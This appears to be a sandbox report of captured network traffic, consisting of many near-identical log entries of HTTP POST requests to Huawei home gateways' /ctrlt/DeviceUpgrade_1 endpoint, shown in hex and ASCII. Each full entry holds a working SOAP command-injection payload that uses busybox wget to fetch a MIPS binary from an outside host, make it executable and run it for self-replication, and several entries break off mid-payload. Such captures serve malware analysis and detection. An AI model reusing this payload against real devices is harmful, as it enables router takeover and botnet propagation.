/bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatu
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 